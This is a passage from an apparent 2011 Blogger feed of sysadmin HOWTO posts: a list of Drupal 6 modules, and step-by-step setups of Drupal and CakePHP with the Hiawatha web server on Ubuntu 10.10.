That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-3430543506518623365?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3430543506518623365'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3430543506518623365'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/03/howto-libreoffice-33-on-ubuntu-1010.html' title='HOWTO : LibreOffice 3.3 on Ubuntu 10.10'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-1051750067937132747</id><published>2011-03-24T19:35:00.004+08:00</published><updated>2011-04-08T18:56:54.493+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Drupal'/><title type='text'>HOWTO : Third Party Modules for Drupal 6</title><content type='html'>The following list is my currently using third party modules of Drupal 6.2.  I would like to share with you all.&lt;br /&gt;
&lt;br /&gt;
Download the following modules with the following url and put them at &lt;code&gt;sites/all/modules/contribute/&lt;/code&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;http://www.drupal.org/project/????&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Where ???? is the following titles&lt;br /&gt;
&lt;br /&gt;
e.g. http://www.drupal.org/project/acl&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;&lt;br /&gt;
acl&lt;br /&gt;
&lt;br /&gt;
# The following are for Google Adsense&lt;br /&gt;
adsense&lt;br /&gt;
adsense_injector&lt;br /&gt;
&lt;br /&gt;
advanced_forum&lt;br /&gt;
advanced_forum_more_styles&lt;br /&gt;
advanced_help&lt;br /&gt;
advuser&lt;br /&gt;
author_pane&lt;br /&gt;
backup_migrate&lt;br /&gt;
bookmark_us&lt;br /&gt;
browscap&lt;br /&gt;
cck&lt;br /&gt;
composite&lt;br /&gt;
content_access&lt;br /&gt;
ctools&lt;br /&gt;
date&lt;br /&gt;
db_maintenance&lt;br /&gt;
emfield&lt;br /&gt;
fb&lt;br /&gt;
fckeditor&lt;br /&gt;
filefield&lt;br /&gt;
formblock&lt;br /&gt;
getid3&lt;br /&gt;
google_analytics&lt;br /&gt;
htmlmail&lt;br /&gt;
i18n&lt;br /&gt;
imageapi&lt;br /&gt;
imagecache&lt;br /&gt;
imagefield&lt;br /&gt;
jquery_ui&lt;br /&gt;
lang_dropdown&lt;br /&gt;
languageicons&lt;br /&gt;
lightbox2&lt;br /&gt;
login_security&lt;br /&gt;
media_youtube&lt;br /&gt;
mimemail&lt;br /&gt;
mobile_tools&lt;br /&gt;
mollom&lt;br /&gt;
mp3player&lt;br /&gt;
&lt;br /&gt;
# The following are for online shop&lt;br /&gt;
nap&lt;br /&gt;
node_access_rebuild_bonus&lt;br /&gt;
&lt;br /&gt;
options_element&lt;br /&gt;
panels&lt;br /&gt;
pathauto&lt;br /&gt;
phone&lt;br /&gt;
phpmailer&lt;br /&gt;
print&lt;br /&gt;
private&lt;br /&gt;
privatemsg&lt;br /&gt;
rules&lt;br /&gt;
security_review&lt;br /&gt;
select_or_other&lt;br /&gt;
signup&lt;br /&gt;
simpletest&lt;br /&gt;
sina_open&lt;br /&gt;
sitedoc&lt;br /&gt;
skinr&lt;br /&gt;
tablefield&lt;br /&gt;
theme_editor&lt;br /&gt;
token&lt;br /&gt;
&lt;br /&gt;
# The following are for online shop&lt;br /&gt;
ubercart&lt;br /&gt;
uberpos&lt;br /&gt;
uc_addresses&lt;br /&gt;
uc_alipay&lt;br /&gt;
uc_coupon&lt;br /&gt;
uc_node_access&lt;br /&gt;
uc_node_checkout&lt;br /&gt;
uc_product_triggers&lt;br /&gt;
uc_views&lt;br /&gt;
&lt;br /&gt;
user_delete&lt;br /&gt;
user_register_notify&lt;br /&gt;
views&lt;br /&gt;
views_bulk_operations&lt;br /&gt;
webform&lt;br /&gt;
webform_validation&lt;br /&gt;
wurfl&lt;br /&gt;
&lt;br /&gt;
# The following are themes for mobile_tools&lt;br /&gt;
fusion&lt;br /&gt;
fusion_mobile&lt;br /&gt;
&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
By the way, if you want to tune the Drupal 6, MySQL and PHP5 as well as Hiawatha, please refer to &lt;a href="http://secure-ubuntu-server.blogspot.com/2011/03/howto-mysql-and-xcache-performance.html"&gt;Performance tuning&lt;/a&gt; and &lt;a href="http://samiux.blogspot.com/2011/02/howto-drupal-62-or-7-with-hiawatha-74.html"&gt;Installation of Hiawatha and Drupal&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-1051750067937132747?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1051750067937132747'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1051750067937132747'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/03/howto-third-party-modules-for-drupal-6.html' title='HOWTO : Third Party Modules for Drupal 6'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-4310623790740281490</id><published>2011-02-21T01:35:00.006+08:00</published><updated>2011-03-30T11:52:26.662+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='MySQL'/><category scheme='http://www.blogger.com/atom/ns#' term='PHP'/><category scheme='http://www.blogger.com/atom/ns#' term='Drupal'/><category scheme='http://www.blogger.com/atom/ns#' term='Hiawatha'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>HOWTO : Drupal 6.2 or 7 with Hiawatha 7.4 WebServer on Ubuntu Server/Desktop 10.10</title><content type='html'>I am going to setup a development environment of Drupal 6.2 or 7 with Hiawatha 7.4 on Ubuntu Desktop 10.10.  However, this setting is also suit for production environment on Ubuntu Server 10.10 with a little bit changing.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 0 - Installation of Hiawatha&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Follow this &lt;a href="http://secure-ubuntu-server.blogspot.com/2010/11/howto-highest-secured-hiawatha-web.html"&gt;link&lt;/a&gt; to install required packages.  You can omit the optional security settings at the moment.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 - Configuration of Hiawatha&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Change the following section to the &lt;code&gt;/etc/hiawatha/hiawatha.conf&lt;/code&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;Binding {&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;Port = 80&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;#Interface = 127.0.0.1&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;MaxKeepAlive = 30&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;TimeForRequest = 3,20&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;MaxRequestSize = 8192&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;MaxUploadSize = 30&lt;br /&gt;
}&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Add the following section to the &lt;code&gt;/etc/hiawatha/hiawatha.conf&lt;/code&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;UrlToolkit {&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;ToolkitID = drupal7&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;RequestURI exists Return&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;Match /favicon.ico Return&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;Match .* Rewrite /index.php&lt;br /&gt;
}&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
or/and&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;UrlToolkit {&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;ToolkitID = drupal6&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;RequestURI exists Return&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;Match ^/favicon.ico$ Return&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;Match /(.*)\?(.*) Rewrite /index.php?q=$1&amp;$2&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;Match /(.*) Rewrite /index.php?q=$1&lt;br /&gt;
}&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 - Configuration of virtual host&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nano /etc/hiawatha/enable-site/drupal7&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Drupal 7 :&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;VirtualHost {&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;Hostname = localhost, 127.0.0.1&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;WebsiteRoot = /var/www/drupal7&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;StartFile = index.php&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;SecureURL = false&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;AccessLogfile = /var/log/hiawatha/access.log&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;ErrorLogfile = /var/log/hiawatha/error.log&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;TimeForCGI = 120&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;#UseFastCGI = PHP5&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;UseToolkit = drupal7&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;#DenyBody = ^.*%3Cscript.*%3C%2Fscript%3E.*$&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;ExecuteCGI = yes&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;PreventCSRF = yes&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;PreventSQLi = yes&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;PreventXSS = yes&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;TriggerOnCGIstatus = no&lt;br /&gt;
}&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
or&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nano /etc/hiawatha/enable-site/drupal6&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Drupal 6 :&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;VirtualHost {&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;Hostname = localhost, 127.0.0.1&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;WebsiteRoot = /var/www/drupal6&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;StartFile = index.php&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;SecureURL = false&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;AccessLogfile = /var/log/hiawatha/access.log&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;ErrorLogfile = /var/log/hiawatha/error.log&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;TimeForCGI = 120&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;#UseFastCGI = PHP5&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;UseToolkit = drupal6&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;#DenyBody = ^.*%3Cscript.*%3C%2Fscript%3E.*$&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;ExecuteCGI = yes&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;PreventCSRF = yes&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;PreventSQLi = yes&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;PreventXSS = yes&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;TriggerOnCGIstatus = no&lt;br /&gt;
}&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2a :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo /etc/init.d/hiawatha restart&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 : Preparation of installation of Drupal&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Download the Drupal from her official site.  Extract the downloaded file and copy to /var/www/.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo tar -xzvf drupal-6.20.tar.gz&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
or&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo tar -xzvf drupal-7.0.tar.gz&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3a :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Create a directory under /var/www/.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo mkdir /var/www/drupal6&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
or&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo mkdir /var/www/drupal7&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3b :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Copy the files to the /var/www/.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo cp ~/drupal-6.20/* /var/www/drupal6&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
or&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo cp ~/drupal-7.0/* /var/www/drupal7&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3c :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd /var/www/drupal6&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
or&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd /var/www/drupal7&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3d :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo chmod a+w sites/default&lt;br /&gt;
sudo mkdir sites/default/files&lt;br /&gt;
sudo chmod a+w sites/default/files&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo cp sites/default/default.settings.php sites/default/settings.php&lt;br /&gt;
sudo chmod a+w sites/default/settings.php&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3e :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;mysql -u root -p&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
After entered the password, create a database for the installation.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;create database drupal;&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
After that, then quit MySQL.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;quit&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3f :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Open the browser and type "&lt;code&gt;localhost&lt;/code&gt;" at the address field to continue the installation.  The database name is "&lt;code&gt;drupal&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
When the installation is completed, carry out the following commands.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo chmod go-w sites/default&lt;br /&gt;
sudo chmod go-w sites/default/settings.php&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo chmod a-r CHANGELOG.txt&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 : Complete the installation&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Drupal 6.2&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo crontab -e&lt;/code&gt; &lt;br /&gt;
&lt;br /&gt;
Add the following :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;0   *   *   *   *   wget -O - -q -t 1 http://localhost/cron.php&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
or&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Drupal 7&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
Administration -- Configuration -- System -- Cron&lt;br /&gt;
&lt;br /&gt;
Get the Cron key at Administration -- Reports -- Status report -- Cron maintenance tasks.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo crontab -e&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;0 * * * * wget -O - -q -t 1 http://localhost/cron.php?cron_key=YOURKEY&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 : Localization (Optional)&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Download the required localization .po file at the following links.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://localize.drupal.org/download"&gt;http://localize.drupal.org/download&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://drupal.org/localize"&gt;http://drupal.org/localize&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-4310623790740281490?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4310623790740281490'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4310623790740281490'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/02/howto-drupal-62-or-7-with-hiawatha-74.html' title='HOWTO : Drupal 6.2 or 7 with Hiawatha 7.4 WebServer on Ubuntu Server/Desktop 10.10'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-4846239308030516814</id><published>2011-02-13T14:57:00.006+08:00</published><updated>2011-02-13T23:58:39.014+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='CakePHP'/><category scheme='http://www.blogger.com/atom/ns#' term='poedit'/><category scheme='http://www.blogger.com/atom/ns#' term='Hiawatha'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>HOWTO : CakePHP 1.3.7 and Hiawatha 7.4 on Ubuntu Desktop 10.10</title><content type='html'>This tutorial shows you how to configure a development environment of CakePHP on Ubuntu Desktop 10.10.  It can also be used in production for Ubuntu Server 10.10.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 0 :&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Follow this &lt;a href="http://secure-ubuntu-server.blogspot.com/2010/11/howto-highest-secured-hiawatha-web.html"&gt;link&lt;/a&gt; to install Hiawatha 7.4 on Ubuntu Desktop 10.10.  The security options can be skipped.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 0a :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nano /etc/hiawatha/hiawatha.conf&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Add the following to "&lt;code&gt;hiawatha.conf&lt;/code&gt;".&lt;br /&gt;
&lt;code&gt;UrlToolkit {&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;ToolkitID = cakephp&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;Match ^/app/webroot/ Skip 2&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;Match ^/app/(.*) Rewrite /$1 Continue&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;Match ^/(.*) Rewrite /app/webroot/$1 Continue&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;RequestURI exists Return&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;Match (.*)\?(.*) Rewrite $1&amp;$2 Continue&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;Match ^/app/webroot/(.*) Rewrite /app/webroot/index.php?url=$1&lt;br /&gt;
}&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;UrlToolkit {&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;ToolkitID = cakephp_apps&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;Match ^/webroot/ Skip 2&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;Match ^/(.*) Rewrite /$1 Continue&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;Match ^/(.*) Rewrite /webroot/$1 Continue&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;RequestURI exists Return&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;Match (.*)\?(.*) Rewrite $1&amp;$2 Continue&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;Match ^/webroot/(.*) Rewrite /webroot/index.php?url=$1&lt;br /&gt;
}&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 0b :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nano /etc/hiawatha/enable-sites/mysite&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;VirtualHost {&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;Hostname = localhost, 127.0.0.1&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;WebsiteRoot = /var/www/mysite&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;StartFile = index.php&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;AccessLogfile = /var/log/hiawatha/access.log&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;ErrorLogfile = /var/log/hiawatha/error.log&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;TimeForCGI = 15&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;#UseFastCGI = PHP5&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;UseToolkit = cakephp_apps&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;DenyBody = ^.*%3Cscript.*%3C%2Fscript%3E.*$&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;ExecuteCGI = yes&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;PreventCSRF = yes&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;PreventSQLi = yes&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;PreventXSS = yes&lt;br /&gt;
}&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Install CakePHP for github.&lt;br /&gt;
&lt;code&gt;sudo apt-get install git&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd /var/www&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo git clone https://github.com/cakephp/cakephp.git&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1a :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nano /etc/environment&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Add the following to the end of the line, but within in the " ".&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;:/var/www/cakephp/cake/console&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1b :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;. /etc/environment&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
To see if the captioned path is included or not :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;echo $PATH&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Create databases and tables according to your project requirement.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;mysql -u root -p&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
When done, type the following :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;quit&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd /var/www&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo su&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cake bake project myproject&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Follows the instruction on the screen.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd /var/www/myproject&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cake bake model all&lt;br /&gt;
cake bake controller all&lt;br /&gt;
cake bake view all&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Exit from the root.&lt;br /&gt;
&lt;code&gt;exit&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd /var/www/myproject/config&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo cp database.php.default database.php&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Change the "&lt;code&gt;login&lt;/code&gt;", "&lt;code&gt;password&lt;/code&gt;" and "&lt;code&gt;database&lt;/code&gt;" accordingly to the MySQL root and password as well as database that you just created.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Now you can open Firefox to browse your application by typing "&lt;code&gt;localhost&lt;/code&gt;" at the address field.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 6 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
To configure localization for the application.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get install libwxgtk2.8-dev libwxbase2.8-0 wx-common wx2.8-headers libwxgtk2.8-0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Go to http://www.poedit.net to download the current version 1.4.6.1.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;tar -xvzf poedit-1.4.6.1.tar.gz&lt;br /&gt;
cd poedit-1.4.6.1&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;./configure&lt;br /&gt;
make&lt;br /&gt;
sudo make install&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Reboot your computer when necessary.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 6a :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd /var/www/myproject&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo su&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cake i18n&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Select "&lt;code&gt;E&lt;/code&gt;" and follows the instruction on screen.  Then, select "&lt;code&gt;I&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
Now, a "&lt;code&gt;default.pot&lt;/code&gt;" file is created at the &lt;code&gt;/var/www/myproject/locale&lt;/code&gt;.&lt;br /&gt;
&lt;br /&gt;
Exit from the root.&lt;br /&gt;
&lt;code&gt;exit&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Execute "&lt;code&gt;poedit&lt;/code&gt;" and open the file "&lt;code&gt;default.pot&lt;/code&gt;".  Translate the content to Traditional Chinese and then save to "&lt;code&gt;default.po&lt;/code&gt;".  A "&lt;code&gt;default.mo&lt;/code&gt;" will also be created.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 6b :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo mkdir /var/www/myproject/locale/zh_TW&lt;/code&gt;&lt;br /&gt;
